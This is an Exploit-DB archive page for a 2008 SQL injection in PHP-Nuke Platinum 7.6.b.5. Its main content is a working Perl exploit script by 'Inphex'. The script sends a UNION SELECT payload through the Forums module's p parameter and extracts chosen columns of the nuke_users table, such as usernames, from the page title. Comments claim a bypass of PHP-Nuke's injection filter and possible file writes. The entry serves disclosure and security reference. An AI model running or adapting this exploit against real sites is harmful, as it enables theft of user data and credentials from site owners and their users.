PHP-Nuke Platinum 7.6.b.5 - 'dynamic_titles.php' SQL Injection

EDB-ID:

5295

CVE:

2008-1680 2008-1539

EDB Verified:

Author:

Inphex

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-03-22

Vulnerable App: 
#!/usr/bin/perl
#Inphex
use LWP::UserAgent;
use LWP::Simple;
use IO::Socket;
use Switch;
#PHP-Nuke Platinum , Forums(Standart) - magic_quotes_gpc = OFF , SQL Injection
#nuke_users Structure:
#user_id 	name 	username 	user_email 	femail 	user_website 	user_avatar 	user_regdate 	user_icq 	user_occ 	user_from 	user_interests 	user_sig 	user_viewemail 	user_theme 	user_aim 	user_yim 	user_msnm 	user_password 	storynum 	umode 	uorder 	thold 	noscore 	bio 	ublockon 	ublock 	theme 	commentmax 	counter 	newsletter 	user_posts 	user_attachsig 	user_rank 	user_level 	broadcast 	popmeson 	user_active 	user_session_time 	user_session_page 	user_lastvisit 	user_timezone 	user_style 	user_lang 	user_dateformatuser_new_privmsg 	user_unread_privmsg 	user_last_privmsg 	user_emailtime 	user_allowhtml 	user_allowbbcode 	user_allowsmile 	user_allowavatar 	user_allow_pm 	user_allow_viewonline 	user_notify 	user_notify_pm 	user_popup_pm 	user_avatar_type 	user_sig_bbcode_uid user_actkey 	user_newpasswd 	last_ip 	user_color_gc 	user_color_gi 	user_quickreply 	user_allow_arcadepm 	kick_ban 	user_wordwrap 	agreedtos 	user_view_log 	user_effects 	user_privs 	user_custitle 	user_specmsg 	user_items 	user_trade 	points 	user_cash 	last_seen_blocker 	user_login_tries 	user_last_login_try 	user_gender 	user_birthday 	user_next_birthday_greeting
#Description:
#The file includes/dynamic_titles.php is vulnerable to SQL Injection - lines:  44 - 427
#What about PHP-Nukes' SQL Injection Protection?
#I could bypass its SQL Injection protection.
#If the file maintenance/index.php is on the server you can see if magic_quotes_gpc are turned off.
#You can of course edit the SQL Injection , file write is possible.
#
#Note: PHP-Nuke Platinum is very buggy,there are more bugs for sure(e.g. includes/nsbypass.php)
print "usage $0 -h localhost -p / -t nuke_users -c username -id 2\n\n";
$column = "username";
$table  = "nuke_users";
$uid    = 2;
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-id" => "uid");

$a = 0;
foreach  (@ARGV) {
	$a++;
	while (($k, $v) = each(%cm_n_)) {
		if ($_ eq $k) {
			${$v} = $ARGV[$a];
		}
	}
}
&getit("http://".$host.$path."modules.php?name=Forums&p=-1'union+select-1,".$column."+from+".$table."+where+user_id='".$uid."","<title>(.*?)<\/title>");
sub getit($$)
{
	$url = shift;
	$reg = shift;


	$ua = LWP::UserAgent->new;
    $urls = $url;
    $response = $ua->get($urls);
    $content = $response->content;

	if ($content=~m/$reg/) {
	    ($f,$s,$l) = split(">>",$1);
	    $s =~s/ Post //;
	    print $column.":".$s."\n";
	}
}

# milw0rm.com [2008-03-22]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services